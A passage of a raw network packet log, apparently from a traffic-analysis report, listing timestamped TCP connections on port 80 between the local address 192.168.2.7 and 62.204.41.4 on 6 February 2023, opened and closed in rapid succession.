                                                                      Feb 6, 2023 18:36:38.769532919 CET804988362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:38.772583961 CET804988362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:38.772748947 CET4988380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:38.881500006 CET4988380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:38.882308960 CET4988480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:38.944531918 CET804988362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:38.944567919 CET804988462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:38.944704056 CET4988380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:38.944792986 CET4988480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:38.947005987 CET4988480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.009176016 CET804988462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:39.011766911 CET804988462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:39.011909008 CET4988480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.162790060 CET4988480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.163536072 CET4988580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.223047972 CET804988562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:39.223434925 CET4988580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.224149942 CET4988580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.225172043 CET804988462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:39.225363970 CET4988480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.283767939 CET804988562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:39.287807941 CET804988562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:39.287950039 CET4988580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.399915934 CET4988580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.400648117 CET4988680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.459657907 CET804988562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:39.459811926 CET4988580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.460134029 CET804988662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:39.460266113 CET4988680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.465156078 CET4988680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.524946928 CET804988662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:39.527257919 CET804988662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:39.527328014 CET4988680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.631373882 CET4988680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.632471085 CET4988780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.691195011 CET804988662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:39.691313028 CET4988680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.694189072 CET804988762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:39.694552898 CET4988780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.694820881 CET4988780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.756726027 CET804988762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:39.759475946 CET804988762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:39.759860039 CET4988780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.866069078 CET4988780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.866235971 CET4988880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.927587032 CET804988762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:39.927619934 CET804988862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:39.927823067 CET4988880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.929411888 CET4988780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.931255102 CET4988880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:39.993911028 CET804988862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:39.997347116 CET804988862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:39.997464895 CET4988880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.100795031 CET4988880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.102320910 CET4988980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.162456989 CET804988862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:40.162606955 CET4988880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.163631916 CET804988962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:40.163794994 CET4988980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.164302111 CET4988980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.225816965 CET804988962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:40.229357958 CET804988962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:40.229502916 CET4988980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.334237099 CET4988980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.336617947 CET4989080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.395699978 CET804988962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:40.397659063 CET4988980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.400021076 CET804989062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:40.400238037 CET4989080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.402321100 CET4989080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.464890957 CET804989062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:40.467500925 CET804989062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:40.467736959 CET4989080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.588109016 CET4989080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.588804007 CET4989180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.650341988 CET804989162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:40.650500059 CET4989180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.650665045 CET804989062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:40.650742054 CET4989080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.650923967 CET4989180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.712398052 CET804989162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:40.715030909 CET804989162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:40.715224981 CET4989180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.818567991 CET4989180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.819410086 CET4989280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.880110979 CET804989262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:40.880206108 CET804989162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:40.880435944 CET4989180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.884686947 CET4989280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.888978958 CET4989280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:40.949668884 CET804989262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:40.951904058 CET804989262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:40.955837965 CET4989280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.069056034 CET4989280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.069802046 CET4989380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.129785061 CET804989262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:41.130269051 CET4989280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.132009983 CET804989362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:41.133230925 CET4989380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.133872032 CET4989380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.196033001 CET804989362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:41.200634956 CET804989362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:41.201684952 CET4989380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.318510056 CET4989380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.319807053 CET4989480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.380381107 CET804989462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:41.380573988 CET4989480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.380892038 CET804989362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:41.380979061 CET4989380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.381592989 CET4989480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.442109108 CET804989462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:41.445008993 CET804989462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:41.445161104 CET4989480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.552683115 CET4989480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.553329945 CET4989580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.613394976 CET804989462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:41.613549948 CET4989480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.614630938 CET804989562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:41.615044117 CET4989580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.619812965 CET4989580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.681375027 CET804989562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:41.683928013 CET804989562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:41.683995962 CET4989580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.787863016 CET4989580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.788930893 CET4989680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.852776051 CET804989562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:41.852905989 CET4989580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.853590965 CET804989662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:41.854012012 CET4989680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.854218006 CET4989680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:41.917088985 CET804989662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:41.918668985 CET804989662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:41.919392109 CET4989680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.021555901 CET4989680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.022388935 CET4989780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.084079981 CET804989662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:42.084268093 CET804989762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:42.084366083 CET4989780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.084999084 CET4989680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.089660883 CET4989780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.154752016 CET804989762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:42.155524969 CET804989762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:42.155662060 CET4989780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.272115946 CET4989780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.272984028 CET4989880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.337409019 CET804989762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:42.337445974 CET804989862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:42.337517023 CET4989780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.337600946 CET4989880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.338053942 CET4989880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.399935961 CET804989862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:42.403964043 CET804989862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:42.404063940 CET4989880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.506584883 CET4989880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.507507086 CET4989980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.568877935 CET804989862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:42.568948984 CET4989880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.570810080 CET804989962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:42.570934057 CET4989980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.575366020 CET4989980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.637904882 CET804989962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:42.640623093 CET804989962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:42.640713930 CET4989980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.756954908 CET4989980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.757854939 CET4990080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.819490910 CET804989962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:42.819592953 CET4989980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.820770025 CET804990062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:42.820883036 CET4990080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.821924925 CET4990080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.885067940 CET804990062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:42.888844013 CET804990062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:42.888948917 CET4990080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.992048025 CET4990080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:42.993006945 CET4990180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.053143978 CET804990162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:43.053332090 CET4990180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.054485083 CET804990062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:43.054605961 CET4990080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.063640118 CET4990180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.123953104 CET804990162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:43.127892017 CET804990162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:43.128042936 CET4990180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.240454912 CET4990180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.241240978 CET4990280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.300750017 CET804990162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:43.300893068 CET4990180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.302834988 CET804990262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:43.302978992 CET4990280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.303335905 CET4990280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.364789963 CET804990262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:43.368645906 CET804990262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:43.368861914 CET4990280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.475498915 CET4990280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.476574898 CET4990380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.537190914 CET804990262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:43.537974119 CET804990362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:43.538094044 CET4990280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.538160086 CET4990380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.538749933 CET4990380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.600173950 CET804990362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:43.603050947 CET804990362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:43.603234053 CET4990380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.717041016 CET4990380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.718286991 CET4990480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.780052900 CET804990362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:43.780277014 CET4990380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.781104088 CET804990462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:43.781239033 CET4990480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.781749964 CET4990480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.844773054 CET804990462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:43.847826958 CET804990462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:43.847954988 CET4990480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.959472895 CET4990480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:43.960391998 CET4990580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:44.021119118 CET804990462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:44.021214962 CET4990480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:44.021918058 CET804990562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:44.025023937 CET4990580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:44.026160002 CET4990580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:44.087682009 CET804990562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:44.092535973 CET804990562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:44.092761040 CET4990580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:44.213074923 CET4990580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:44.213895082 CET4990680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:44.520972013 CET4990580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:44.582518101 CET804990562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:44.582657099 CET4990580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.224391937 CET4990680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.286139011 CET804990662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:47.286850929 CET4990680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.288237095 CET4990680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.349865913 CET804990662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:47.353909969 CET804990662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:47.357145071 CET4990680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.459383965 CET4990680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.461538076 CET4990780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.521030903 CET804990662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:47.521218061 CET4990680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.522254944 CET804990762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:47.522387028 CET4990780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.522865057 CET4990780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.583662033 CET804990762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:47.586518049 CET804990762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:47.586666107 CET4990780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.694968939 CET4990780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.697320938 CET4990880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.755672932 CET804990762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:47.755788088 CET4990780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.758610010 CET804990862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:47.758757114 CET4990880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.759181023 CET4990880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.820456028 CET804990862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:47.823967934 CET804990862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:47.824065924 CET4990880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.928690910 CET4990880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.929630041 CET4990980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.990194082 CET804990862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:47.990338087 CET4990880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.990917921 CET804990962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:47.991058111 CET4990980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:47.991595030 CET4990980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.053137064 CET804990962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:48.057262897 CET804990962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:48.057457924 CET4990980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.165266991 CET4990980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.166500092 CET4991080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.227133989 CET804990962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:48.227363110 CET4990980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.229289055 CET804991062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:48.229479074 CET4991080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.230041981 CET4991080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.292443037 CET804991062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:48.295130014 CET804991062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:48.295310974 CET4991080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.397573948 CET4991080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.398396969 CET4991180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.460892916 CET804991162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:48.461044073 CET4991180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.462049007 CET804991062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:48.462126970 CET4991080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.462366104 CET4991180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.524959087 CET804991162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:48.527606964 CET804991162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:48.527715921 CET4991180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.641889095 CET4991180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.642621040 CET4991280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.703342915 CET804991262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:48.703385115 CET804991162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:48.703468084 CET4991280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.703535080 CET4991180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.704071045 CET4991280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.764588118 CET804991262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:48.767746925 CET804991262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:48.767894983 CET4991280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.881747007 CET4991280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.882531881 CET4991380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.943020105 CET804991262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:48.943130016 CET4991280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.943830013 CET804991362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:48.943958044 CET4991380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:48.947845936 CET4991380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.009886980 CET804991362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:49.011852980 CET804991362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:49.012006998 CET4991380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.117221117 CET4991380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.118207932 CET4991480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.178798914 CET804991362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:49.178953886 CET4991380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.180711031 CET804991462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:49.180871010 CET4991480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.185767889 CET4991480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.248403072 CET804991462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:49.253202915 CET804991462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:49.253361940 CET4991480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.366781950 CET4991480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.367737055 CET4991580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.429322958 CET804991562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:49.429366112 CET804991462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:49.429514885 CET4991480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.430013895 CET4991580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.430013895 CET4991580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.491678953 CET804991562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:49.494277000 CET804991562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:49.496871948 CET4991580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.600625038 CET4991580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.601630926 CET4991680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.661786079 CET804991562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:49.661843061 CET804991662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:49.661992073 CET4991580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.662094116 CET4991680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.663084984 CET4991680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.723509073 CET804991662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:49.726577997 CET804991662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:49.728715897 CET4991680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.835788965 CET4991680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.842086077 CET4991780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.896776915 CET804991662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:49.898637056 CET4991680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:49.903929949 CET804991762.204.41.4192.168.2.7
